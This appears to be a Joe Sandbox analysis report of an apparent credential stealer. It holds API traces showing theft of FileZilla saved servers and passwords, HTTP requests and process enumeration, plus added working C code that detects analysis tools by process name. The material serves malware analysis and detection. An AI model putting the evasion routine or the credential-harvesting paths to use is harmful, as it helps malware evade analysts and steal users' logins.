                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                                                                                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                          • API String ID: 4146028692-935134978
                                                                                                                                                                                                                                                          • Opcode ID: d63e3469a0e183ca0753c7bfd8a85bce8ab50c5d31924b686071049c7a4bfb12
                                                                                                                                                                                                                                                          • Instruction ID: b8836e99889b0f3dbf12104240b0e7fb1c6907cb60b78f556c5f3eada528c545
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d63e3469a0e183ca0753c7bfd8a85bce8ab50c5d31924b686071049c7a4bfb12
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13A14F32940219AFCF40BBB2ED4A9DE7B79BF04700F404451F701BB126EBB96E05AB91

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1020 ff80c5-ff80d5 call ff801c 1023 ff80db-ff82c1 call fe7d39 GetProcAddress * 20 1020->1023 1024 ff82c6-ff8323 LoadLibraryA * 5 1020->1024 1023->1024 1025 ff8337-ff833e 1024->1025 1026 ff8325-ff8332 GetProcAddress 1024->1026 1028 ff8369-ff8370 1025->1028 1029 ff8340-ff8364 GetProcAddress * 2 1025->1029 1026->1025 1031 ff8384-ff838b 1028->1031 1032 ff8372-ff837f GetProcAddress 1028->1032 1029->1028 1034 ff839f-ff83a6 1031->1034 1035 ff838d-ff839a GetProcAddress 1031->1035 1032->1031 1036 ff83a8-ff83cc GetProcAddress * 2 1034->1036 1037 ff83d1 1034->1037 1035->1034 1036->1037
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8106
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF811D
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8134
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF814B
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8162
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8179
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8190
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF81A7
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF81BE
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF81D5
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF81EC
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8203
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF821A
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8231
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8248
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF825F
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF8276
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF828D
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF82A4
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF82BB
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,00FF7F44), ref: 00FF82CC
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,00FF7F44), ref: 00FF82DD
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,00FF7F44), ref: 00FF82EE
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,00FF7F44), ref: 00FF82FF
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,00FF7F44), ref: 00FF8310
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(76850000,00FF7F44), ref: 00FF832C
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(77040000,00FF7F44), ref: 00FF8347
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF835E
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(75A10000,00FF7F44), ref: 00FF8379
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(75690000,00FF7F44), ref: 00FF8394
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(776F0000,00FF7F44), ref: 00FF83AF
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00FF83C6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID:
• API String ID: 2238633743-0
• Opcode ID: 7b5ac824de335339d3cd64176e49ced1311683260defe9ca69f1ee0479914b24
• Instruction ID: 89523ef4004597e9b2390554cef00eed6348a8b226c812aa4e40c220a1117a6b
• Opcode Fuzzy Hash: 7b5ac824de335339d3cd64176e49ced1311683260defe9ca69f1ee0479914b24
• Instruction Fuzzy Hash: 02710D75401616EFDBB25F64FA0D8663BB3F72C355384C526EB858262CE7724850EF41

Control-flow Graph
control_flow_graph (basic blocks as "id address-range calls/APIs", edges as "from->to")
• 1462 fe6955-fe69d9 call ff073c call fe4aa7 call ff070a InternetOpenA StrCmpCA
• 1469 fe69dc-fe69e2
• 1462->1469
• 1470 fe69db
• 1462->1470
• 1471 fe69e8-fe6a0e InternetConnectA
• 1469->1471
• 1472 fe6b60-fe6b6c call ff073c
• 1469->1472
• 1470->1469
• 1473 fe6b54-fe6b5a InternetCloseHandle
• 1471->1473
• 1474 fe6a14-fe6a4f HttpOpenRequestA
• 1471->1474
• 1478 fe6b71-fe6b9c call fe2910 * 3 call ffcab4
• 1472->1478
• 1473->1472
• 1476 fe6b48-fe6b4e InternetCloseHandle
• 1474->1476
• 1477 fe6a55-fe6a57
• 1474->1477
• 1476->1473
• 1480 fe6a59-fe6a6f InternetSetOptionA
• 1477->1480
• 1481 fe6a75-fe6aa6 HttpSendRequestA HttpQueryInfoA
• 1477->1481
• 1480->1481
• 1483 fe6abd-fe6acd call ff1d20
• 1481->1483
• 1484 fe6aa8
• 1481->1484
• 1491 fe6b9d-fe6ba2
• 1483->1491
• 1492 fe6ad3-fe6ad5
• 1483->1492
• 1486 fe6aad-fe6ab8 call ff070a
• 1484->1486
• 1486->1478
• 1491->1486
• 1495 fe6b3c-fe6b42 InternetCloseHandle
• 1492->1495
• 1496 fe6ad7-fe6adc
• 1492->1496
• 1495->1476
• 1498 fe6b1d-fe6b3a InternetReadFile
• 1496->1498
• 1498->1495
• 1501 fe6ade-fe6ae6
• 1498->1501
• 1501->1495
• 1502 fe6ae8-fe6b18 call ff082c call ff07b0 call fe2910
• 1501->1502
• 1502->1498
APIs
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
  • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AD9
  • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4ADF
  • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AE5
  • Part of subcall function 00FE4AA7: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00FE4AF7
  • Part of subcall function 00FE4AA7: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00FE4AFF
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
• InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE69B7
• StrCmpCA.SHLWAPI(?), ref: 00FE69D1
• InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6A00
• HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00FE6A3F
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE6A6F
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE6A7A
• HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00FE6A9E
• InternetReadFile.WININET(?,?,000007CF,?), ref: 00FE6B32
• InternetCloseHandle.WININET(?), ref: 00FE6B42
• InternetCloseHandle.WININET(?), ref: 00FE6B4E
• InternetCloseHandle.WININET(?), ref: 00FE6B5A
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
• String ID: ERROR$ERROR$GET
• API String ID: 3863758870-2509457195
• Opcode ID: 0135211b612a63f186019c726389f99091979eb0aa7fe3f859ab1231a67949ac
• Instruction ID: 117be23bca9defa0c9a2d104379233709f0bf3c0e42bff48bb91311e8bbb53e6
• Opcode Fuzzy Hash: 0135211b612a63f186019c726389f99091979eb0aa7fe3f859ab1231a67949ac
• Instruction Fuzzy Hash: A7519D729001ADAFDF20AF61DC85AEEB7B9FB04340F0081E6F648E6151DE755E85AF80
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
• GetKeyboardLayoutList.USER32(00000000,00000000,010157B7,?,?), ref: 00FF102F
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00FF103D
• GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00FF104B
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00FF107A
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
• LocalFree.KERNEL32(00000000), ref: 00FF1122
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
• String ID: /
• API String ID: 507856799-4001269591
• Opcode ID: 5ffe0c537f657af20cadad82735a2b4fd2945de330a9864285636e8311a83b92
• Instruction ID: d5f5203750719219fb684b565180b0f24b13e9db0dba608c8583f77dab63605c
• Opcode Fuzzy Hash: 5ffe0c537f657af20cadad82735a2b4fd2945de330a9864285636e8311a83b92
• Instruction Fuzzy Hash: 08310B75D0022C9FDB20AB65DC8DAADB3B8BF04300F5141E5F619A7162CB786E85DF90
APIs
• __EH_prolog3_catch.LIBCMT ref: 00FF1981
• CoCreateInstance.OLE32(010121C8,00000000,00000001,0101A004,?,00000018,00FF1B24,?), ref: 00FF19A4
• SysAllocString.OLEAUT32(?), ref: 00FF19B1
• _wtoi64.MSVCRT ref: 00FF19E4
• SysFreeString.OLEAUT32(?), ref: 00FF19FD
• SysFreeString.OLEAUT32(00000000), ref: 00FF1A04
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
• String ID:
• API String ID: 181426013-0
• Opcode ID: ff7f897dec02997b174796e91f0dad5b92ffe5287fee05025542f4360c955c07
• Instruction ID: b6fda22dfa5d2c34e8f4c3b168ffb582fcd2c4ca6c79859fba623fdc32c4667e
• Opcode Fuzzy Hash: ff7f897dec02997b174796e91f0dad5b92ffe5287fee05025542f4360c955c07
• Instruction Fuzzy Hash: AB115E71D0424BDFCB21DFA4C8889EEBBB5BF49310F144469F645E7290CB794941DB60
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,010157BE,?,?), ref: 00FF16F7
• Process32First.KERNEL32(00000000,00000128), ref: 00FF1707
• Process32Next.KERNEL32(00000000,00000128), ref: 00FF1765
• CloseHandle.KERNEL32(00000000), ref: 00FF1770
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
• String ID:
• API String ID: 907984538-0
• Opcode ID: fad868a1f0fff819f5228872e8beea28041735e1a1faefaf327759d42132d30f
• Instruction ID: 8f43ad4c8886b6bc51b0b4a1045550479bba003a7d84df3e3738952d67b02bda
• Opcode Fuzzy Hash: fad868a1f0fff819f5228872e8beea28041735e1a1faefaf327759d42132d30f
• Instruction Fuzzy Hash: 30113076A0021C9BD721BB65EC85AFD73A9BF44310F404095FB09B7256DF78AE44AF90
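The function above is a Toolhelp32 process walk (CreateToolhelp32Snapshot with flag 0x2 = TH32CS_SNAPPROCESS, then Process32First/Process32Next with a 0x128-byte PROCESSENTRY32, which is the ANSI structure size in a 32-bit process, and finally CloseHandle). The report flags this pattern under "Searches for specific processes" and "Tries to detect sandboxes and other dynamic analysis tools (process name ...)" but does not disclose which names the sample compares against. The following is an added example, written for this page and not code from the sample or from Joe Sandbox, that reproduces the walk and the case-insensitive name comparison typically run on each entry. The watch-list of analysis-tool process names is an assumption for illustration only; the portable matching logic compiles and runs anywhere, while the snapshot walk itself is compiled only under _WIN32.

```c
/* Added example: Toolhelp32 process walk plus name matching. Not the sample's code.
 * The WATCHED list is assumed for illustration; the report does not reveal the
 * names this sample looks for. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#ifdef _WIN32
#include <windows.h>
#include <tlhelp32.h>
#endif

/* Assumed watch-list: process names commonly associated with analysis tooling. */
static const char *const WATCHED[] = {
    "procmon.exe", "procmon64.exe", "wireshark.exe", "x64dbg.exe", "x32dbg.exe",
    "ollydbg.exe", "idaq.exe", "idaq64.exe", "processhacker.exe", "vboxservice.exe",
    "vmtoolsd.exe",
};
#define WATCHED_COUNT (sizeof(WATCHED) / sizeof(WATCHED[0]))

/* Case-insensitive ASCII compare: szExeFile comes back in whatever case the
 * image was launched with, so a plain strcmp against a lowercase list misses. */
static int ieq(const char *a, const char *b)
{
    for (; *a && *b; ++a, ++b)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == '\0' && *b == '\0';
}

/* Returns the index into WATCHED of a matching name, or -1 when the name is not
 * on the list. Kept portable so it can be unit-tested without Windows. */
int classify_process_name(const char *exe_name)
{
    for (size_t i = 0; i < WATCHED_COUNT; ++i)
        if (ieq(exe_name, WATCHED[i]))
            return (int)i;
    return -1;
}

/* Counts watched names in a NULL-terminated list; models one full snapshot walk. */
int count_watched(const char *const *names)
{
    int hits = 0;
    for (; *names; ++names)
        if (classify_process_name(*names) >= 0)
            ++hits;
    return hits;
}

/* Constructed snapshot contents (not captured from the sample's run) standing in
 * for what an analysis VM might return. Two of the five names are on the list. */
int demo_sample_hits(void)
{
    static const char *const sample[] = {
        "System", "svchost.exe", "ProcMon64.exe", "explorer.exe", "VBoxService.exe", NULL
    };
    return count_watched(sample);
}

#ifdef _WIN32
/* The real walk. TH32CS_SNAPPROCESS is 0x2, matching the first argument recorded
 * in the report; dwSize must be set to sizeof(PROCESSENTRY32) (0x128 for the ANSI
 * structure in a 32-bit build) before Process32First, or the call fails. */
int scan_running_processes(void)
{
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == INVALID_HANDLE_VALUE)
        return -1;
    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(pe);
    int hits = 0;
    if (Process32First(snap, &pe)) {
        do {
            if (classify_process_name(pe.szExeFile) >= 0)
                ++hits;
        } while (Process32Next(snap, &pe));
    }
    CloseHandle(snap);
    return hits;
}
#endif

int main(void)
{
    printf("watched processes in constructed sample: %d\n", demo_sample_hits());
#ifdef _WIN32
    printf("watched processes on this host: %d\n", scan_running_processes());
#endif
    return 0;
}
```

For detection purposes the useful signal is not the snapshot itself (many legitimate programs enumerate processes) but the combination with the other behaviours the report records: a process walk immediately followed by a conditional exit, or by process-injection primitives, is what distinguishes the evasion check from benign use.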
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00FF0F6C
